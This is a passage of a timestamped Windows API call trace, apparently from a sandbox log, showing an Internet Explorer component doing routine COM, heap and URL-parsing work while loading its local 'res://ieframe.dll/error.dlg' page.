IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6cdfbc | out: ppvObject=0x6cdfbc*=0x0) returned 0x80004002 [0158.890] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6cdfb8 | out: ppvObject=0x6cdfb8*=0x0) returned 0x80004002 [0158.890] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x6cdfb4 | out: ppvObject=0x6cdfb4*=0x0) returned 0x80004002 [0158.890] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6cdfb0 | out: ppvObject=0x6cdfb0*=0xd1e334) returned 0x0 [0158.890] IUnknown:Release (This=0xd121e8) returned 0x0 [0158.890] CoTaskMemFree (pv=0x0) [0158.890] CoTaskMemFree (pv=0x0) [0158.891] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.891] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.891] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.891] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.891] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.891] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.892] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.892] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.892] wcsncmp (_String1="HKCU\\", _String2="HKCU\\", _MaxCount=0x5) returned 0 [0158.892] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0158.892] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Internet Explorer") returned 0 [0158.892] GetSysColor (nIndex=26) returned 0xcc6600 [0158.892] GetSysColor (nIndex=5) returned 0xffffff [0158.892] GetSysColor (nIndex=8) returned 0x0 [0158.893] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6057c8 | out: hHeap=0x5e0000) returned 1 [0158.893] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ee728 | out: hHeap=0x5e0000) returned 1 [0158.893] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x605528 | out: hHeap=0x5e0000) returned 1 [0158.893] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f25e0 | out: hHeap=0x5e0000) returned 1 [0158.898] wcstol (in: _String="0,0,255", _EndPtr=0x197fcc, _Radix=10 | out: _EndPtr=0x197fcc*=",0,255") returned 0 [0158.898] wcstol (in: _String="0,255", _EndPtr=0x197fcc, _Radix=10 | out: _EndPtr=0x197fcc*=",255") returned 0 [0158.898] wcstol (in: _String="255", _EndPtr=0x197fcc, _Radix=10 | out: _EndPtr=0x197fcc*="") returned 255 [0158.898] wcstol (in: _String="128,0,128", _EndPtr=0x197fcc, _Radix=10 | out: _EndPtr=0x197fcc*=",0,128") returned 128 [0158.898] wcstol (in: _String="0,128", _EndPtr=0x197fcc, _Radix=10 | out: _EndPtr=0x197fcc*=",128") returned 0 [0158.898] wcstol (in: _String="128", _EndPtr=0x197fcc, _Radix=10 | out: _EndPtr=0x197fcc*="") returned 128 [0158.905] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.905] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.905] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x68f530 [0158.905] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9a) returned 0x6d2f08 [0158.906] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.906] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x26) returned 0x5f25e0 [0158.906] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9e) returned 0x6d2a70 [0158.907] GetProcessHeap () returned 0x5e0000 [0158.907] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6134d8 | out: hHeap=0x5e0000) returned 1 [0158.907] GetProcessHeap () returned 0x5e0000 [0158.907] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612e98 | out: hHeap=0x5e0000) returned 1 [0158.907] GetProcessHeap () returned 0x5e0000 [0158.907] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6678 | out: hHeap=0x5e0000) returned 1 [0158.908] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.908] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.909] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.909] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.909] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.909] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.909] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.910] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.910] _ltow_s (in: _Value=3, _Buffer=0x1980d0, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.910] GetAcceptLanguagesW () returned 0x0 [0158.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.911] memcpy_s (in: _Destination=0x1993b0, _DestinationSize=0x1000, _Source=0x6e896354, _SourceSize=0xc | out: _Destination=0x1993b0) returned 0x0 [0158.911] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5ea338, Size=0x10) returned 0x67a178 [0158.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.911] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.911] IUnknown:Release (This=0xcf8ae0) returned 0x0 [0158.937] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e930, _DestinationSize=0x6, _Source=0x6d6fe0a0, _SourceSize=0x4 | out: _Destination=0xd0e930) returned 0x0 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e950, _DestinationSize=0xc, _Source=0x6d6fe094, _SourceSize=0xa | out: _Destination=0xd0e950) returned 0x0 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e970, _DestinationSize=0xa, _Source=0x6d6fe088, _SourceSize=0x8 | out: _Destination=0xd0e970) returned 0x0 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e990, _DestinationSize=0xc, _Source=0x6d6fe07c, _SourceSize=0xa | out: _Destination=0xd0e990) returned 0x0 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e9b0, _DestinationSize=0x6, _Source=0x6d6fe074, _SourceSize=0x4 | out: _Destination=0xd0e9b0) returned 0x0 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e9d0, _DestinationSize=0x8, _Source=0x6d6fe06c, _SourceSize=0x6 | out: _Destination=0xd0e9d0) returned 0x0 [0158.938] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.938] memcpy_s (in: _Destination=0xd0e9f0, _DestinationSize=0x6, _Source=0x6d6fe064, _SourceSize=0x4 | out: _Destination=0xd0e9f0) returned 0x0 [0158.939] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.939] memcpy_s (in: _Destination=0xd0ea10, _DestinationSize=0x8, _Source=0x6d6fe05c, _SourceSize=0x6 | out: _Destination=0xd0ea10) returned 0x0 [0158.939] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5e38 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5e88 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5c80 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5eb0 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5d48 [0158.939] _ltow_s (in: _Value=0, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="0") returned 0x0 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8b08 [0158.939] _ltow_s (in: _Value=5, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="5") returned 0x0 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d88c8 [0158.939] _ltow_s (in: _Value=7, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="7") returned 0x0 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8928 [0158.939] _ltow_s (in: _Value=8, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="8") returned 0x0 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8ae8 [0158.939] _ltow_s (in: _Value=9, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="9") returned 0x0 [0158.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8b28 [0158.940] _ltow_s (in: _Value=10, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="10") returned 0x0 [0158.940] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d88e8 [0158.940] _ltow_s (in: _Value=11, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="11") returned 0x0 [0158.940] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d8a48 [0158.940] _ltow_s (in: _Value=12, _Buffer=0x19a058, _BufferCount=0x21, _Radix=10 | out: _Buffer="12") returned 0x0 [0158.940] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6d8a08 [0158.940] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.940] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8b48 [0158.940] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.940] memcpy_s (in: _Destination=0xd0ea30, _DestinationSize=0x6, _Source=0x6b6598, _SourceSize=0x4 | out: _Destination=0xd0ea30) returned 0x0 [0158.941] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6904d8 [0158.941] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.941] memcpy_s (in: _Destination=0xd0ea50, _DestinationSize=0x8, _Source=0x6b6678, _SourceSize=0x6 | out: _Destination=0xd0ea50) returned 0x0 [0158.941] GetProcessHeap () returned 0x5e0000 [0158.941] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6598 | out: hHeap=0x5e0000) returned 1 [0158.941] GetProcessHeap () returned 0x5e0000 [0158.941] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6678 | out: hHeap=0x5e0000) returned 1 [0158.941] GetProcessHeap () returned 0x5e0000 [0158.941] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6748 | out: hHeap=0x5e0000) returned 1 [0158.941] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0158.942] GetProcAddress (hModule=0x703b0000, lpProcName="CreateAsyncBindCtxEx") returned 0x704150b0 [0158.942] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19a3a0 | out: lpflOldProtect=0x19a3a0*=0x4) returned 1 [0158.943] CreateAsyncBindCtxEx (in: pbc=0x0, dwOptions=0x0, pBSCb=0x0, pEnum=0x0, ppBC=0x19a444*=0x0, reserved=0x0 | out: ppBC=0x19a444*=0x6d8128) returned 0x0 [0158.946] IMoniker:GetDisplayName (in: This=0x613358, pbc=0x6d8128, pmkToLeft=0x0, ppszDisplayName=0x19a364 | out: ppszDisplayName=0x19a364*="res://ieframe.dll/error.dlg") returned 0x0 [0158.946] IUnknown:QueryInterface (in: This=0x613358, riid=0x6d74ffc4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x19a338 | out: ppvObject=0x19a338*=0x613364) returned 0x0 [0158.946] IUriContainer:GetIUri (in: This=0x613364, ppIUri=0x19a368 | out: ppIUri=0x19a368*=0x68e73c) returned 0x0 [0158.946] IUnknown:Release (This=0x613364) returned 0x2 [0158.946] IUnknown:AddRef (This=0x613358) returned 0x3 [0158.946] IUnknown:AddRef (This=0x68e73c) returned 0x6 [0158.949] GetSysColor (nIndex=26) returned 0xcc6600 [0158.949] GetSysColor (nIndex=5) returned 0xffffff [0158.950] GetSysColor (nIndex=8) returned 0x0 [0158.950] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2f08 | out: hHeap=0x5e0000) returned 1 [0158.950] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68f530 | out: hHeap=0x5e0000) returned 1 [0158.950] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2a70 | out: hHeap=0x5e0000) returned 1 [0158.950] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f25e0 | out: hHeap=0x5e0000) returned 1 [0158.955] wcstol (in: _String="0,0,255", _EndPtr=0x197e1c, _Radix=10 | out: _EndPtr=0x197e1c*=",0,255") returned 0 [0158.955] wcstol (in: _String="0,255", _EndPtr=0x197e1c, _Radix=10 | out: _EndPtr=0x197e1c*=",255") returned 0 [0158.956] wcstol (in: _String="255", _EndPtr=0x197e1c, _Radix=10 | out: _EndPtr=0x197e1c*="") returned 255 [0158.956] wcstol (in: _String="128,0,128", _EndPtr=0x197e1c, _Radix=10 | out: _EndPtr=0x197e1c*=",0,128") returned 128 [0158.956] wcstol (in: _String="0,128", _EndPtr=0x197e1c, _Radix=10 | out: _EndPtr=0x197e1c*=",128") returned 0 [0158.956] wcstol (in: _String="128", _EndPtr=0x197e1c, _Radix=10 | out: _EndPtr=0x197e1c*="") returned 128 [0158.960] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.960] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.960] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3a) returned 0x68f530 [0158.962] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9a) returned 0x6d3058 [0158.962] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.962] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x26) returned 0x6d8308 [0158.962] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9e) returned 0x6d2878 [0158.963] GetProcessHeap () returned 0x5e0000 [0158.963] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c8298 | out: hHeap=0x5e0000) returned 1 [0158.963] GetProcessHeap () returned 0x5e0000 [0158.963] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c7f18 | out: hHeap=0x5e0000) returned 1 [0158.963] GetProcessHeap () returned 0x5e0000 [0158.963] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6598 | out: hHeap=0x5e0000) returned 1 [0158.964] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.964] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.964] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.964] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.965] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.965] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.965] _ltow_s (in: _Value=3, _Buffer=0x197f20, _BufferCount=0x21, _Radix=10 | out: _Buffer="3") returned 0x0 [0158.965] GetAcceptLanguagesW () returned 0x0 [0158.966] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.966] memcpy_s (in: _Destination=0x199200, _DestinationSize=0x1000, _Source=0x6e896354, _SourceSize=0xc | out: _Destination=0x199200) returned 0x0 [0158.966] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x67a178, Size=0x10) returned 0x690640 [0158.966] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__SESSIONSTORAGE", ppunk=0x19a32c | out: ppunk=0x19a32c*=0x0) returned 0x80004005 [0158.966] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="{d4db6850-5385-11d0-89e9-00a0c90a90ac}", ppunk=0x19a32c | out: ppunk=0x19a32c*=0x0) returned 0x80004005 [0158.966] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__PrecreatedObject", ppunk=0x19a32c | out: ppunk=0x19a32c*=0x0) returned 0x80004005 [0158.967] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.967] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.967] IMoniker:GetDisplayName (in: This=0x613358, pbc=0x6d8128, pmkToLeft=0x0, ppszDisplayName=0x19a31c | out: ppszDisplayName=0x19a31c*="res://ieframe.dll/error.dlg") returned 0x0 [0158.968] UrlGetLocationW (psz1="res://ieframe.dll/error.dlg") returned 0x0 [0158.968] UrlGetLocationW (psz1=0x0) returned 0x0 [0158.969] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="res://ieframe.dll/error.dlg", ppmk=0x19a200*=0x0, dwFlags=0x1 | out: ppmk=0x19a200*=0x6c8c18) returned 0x0 [0158.969] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0158.969] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199e0c | out: ppvObject=0x199e0c*=0x6e784f9c) returned 0x0 [0158.969] IUnknown:Release (This=0x6e784f90) returned 0x1 [0158.969] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6d8f40, cchResult=0x824, pcchResult=0x19a124, dwReserved=0x0 | out: pwzResult="", pcchResult=0x19a124*=0x0) returned 0x800c0011 [0158.969] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0158.970] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x19a1ec | out: ppURI=0x19a1ec*=0x68e1fc) returned 0x0 [0158.970] IUri:GetScheme (in: This=0x68e1fc, pdwScheme=0x19a184 | out: pdwScheme=0x19a184*=0x12) returned 0x0 [0158.970] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.970] IUnknown:AddRef (This=0x68e1fc) returned 0x4 [0158.970] IUri:GetAbsoluteUri (in: This=0x68e1fc, pbstrAbsoluteUri=0xcf8b10 | out: pbstrAbsoluteUri=0xcf8b10*="res://ieframe.dll/error.dlg") returned 0x0 [0158.970] IUnknown:Release (This=0x68e1fc) returned 0x3 [0158.970] IUnknown:AddRef (This=0x6c8c18) returned 0x2 [0158.970] IUnknown:Release (This=0x6c8c18) returned 0x1 [0158.970] IUnknown:AddRef (This=0x613358) returned 0x4 [0158.971] IUnknown:Release (This=0x6c8c18) returned 0x0 [0158.971] CoInternetIsFeatureEnabled (FeatureEntry=0x15, dwFlags=0x2) returned 0x1 [0158.971] IUnknown:AddRef (This=0x613358) returned 0x5 [0158.971] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199e34 | out: ppvObject=0x199e34*=0x68e73c) returned 0x0 [0158.971] IUnknown:Release (This=0x68e73c) returned 0x6 [0158.971] IUnknown:AddRef (This=0x68e73c) returned 0x7 [0158.971] IUnknown:QueryInterface (in: This=0x613358, riid=0x6d74ffc4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x199e00 | out: ppvObject=0x199e00*=0x613364) returned 0x0 [0158.971] IUriContainer:GetIUri (in: This=0x613364, ppIUri=0x19a098 | out: ppIUri=0x19a098*=0x68e73c) returned 0x0 [0158.972] IUnknown:Release (This=0x613364) returned 0x5 [0158.972] IUnknown:AddRef (This=0x613358) returned 0x6 [0158.972] IUnknown:Release (This=0x613358) returned 0x5 [0158.972] IUnknown:AddRef (This=0x68e73c) returned 0x9 [0158.972] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199e34 | out: ppvObject=0x199e34*=0x68e73c) returned 0x0 [0158.972] IUnknown:Release (This=0x68e73c) returned 0x9 [0158.972] IUnknown:AddRef (This=0x68e73c) returned 0xa [0158.972] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x199e3c | out: pdwScheme=0x199e3c*=0x12) returned 0x0 [0158.972] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0158.973] GetCurrentProcessId () returned 0xe14 [0158.973] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199e34 | out: ppvObject=0x199e34*=0x68e73c) returned 0x0 [0158.973] IUnknown:Release (This=0x68e73c) returned 0xa [0158.973] IUnknown:AddRef (This=0x68e73c) returned 0xb [0158.973] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.973] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0158.974] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="BIND_CONTEXT_PARAM", ppunk=0x199e30 | out: ppunk=0x199e30*=0x0) returned 0x80004005 [0158.974] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__HTMLLOADOPTIONS", ppunk=0x199c04 | out: ppunk=0x199c04*=0x0) returned 0x80004005 [0158.974] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__HTMLLOADOPTIONSNAV", ppunk=0x199c00 | out: ppunk=0x199c00*=0x0) returned 0x80004005 [0158.974] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__DWNBINDINFO", ppunk=0x199e18 | out: ppunk=0x199e18*=0x0) returned 0x80004005 [0158.974] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x199e10 | out: pdwScheme=0x199e10*=0x12) returned 0x0 [0158.974] IUri:GetAbsoluteUri (in: This=0x68e73c, pbstrAbsoluteUri=0x199e34 | out: pbstrAbsoluteUri=0x199e34*="res://ieframe.dll/error.dlg") returned 0x0 [0158.975] SysStringLen (param_1="res://ieframe.dll/error.dlg") returned 0x1b [0158.975] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19a084 | out: ppURI=0x19a084*=0x68e1fc) returned 0x0 [0158.999] IUnknown:Release (This=0x68e73c) returned 0xa [0158.999] IUri:GetScheme (in: This=0x68e1fc, pdwScheme=0x199dec | out: pdwScheme=0x199dec*=0x12) returned 0x0 [0158.999] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="BIND_CONTEXT_BASE_DOMAIN", ppunk=0x199e30 | out: ppunk=0x199e30*=0x0) returned 0x80004005 [0158.999] IUnknown:AddRef (This=0x68e1fc) returned 0x5 [0158.999] IUri:GetPropertyDWORD (in: This=0x68e1fc, uriProp=0x11, pdwProperty=0x199bac, dwFlags=0x0 | out: pdwProperty=0x199bac*=0x12) returned 0x0 [0158.999] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0158.999] IUnknown:QueryInterface (in: This=0xd1e334, riid=0x703b4c58*(Data1=0xc90db44a, Data2=0x1902, Data3=0x451e, Data4=([0]=0xbd, [1]=0xf0, [2]=0x5c, [3]=0x89, [4]=0x66, [5]=0xb, [6]=0x52, [7]=0x8c)), ppvObject=0x199b04 | out: ppvObject=0x199b04*=0x0) returned 0x80004002 [0158.999] IInternetSecurityManager:GetSecurityId (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pbSecurityId=0x199c38, pcbSecurityId=0x199c34*=0x200, dwReserved=0x0 | out: pbSecurityId=0x199c38*=0x0, pcbSecurityId=0x199c34*=0x200) returned 0x800c0011 [0158.999] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0158.999] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x198eb8 | out: ppvObject=0x198eb8*=0x6e784f9c) returned 0x0 [0159.000] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.000] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=3, dwParseFlags=0x0, pwzResult=0x6c8a98, 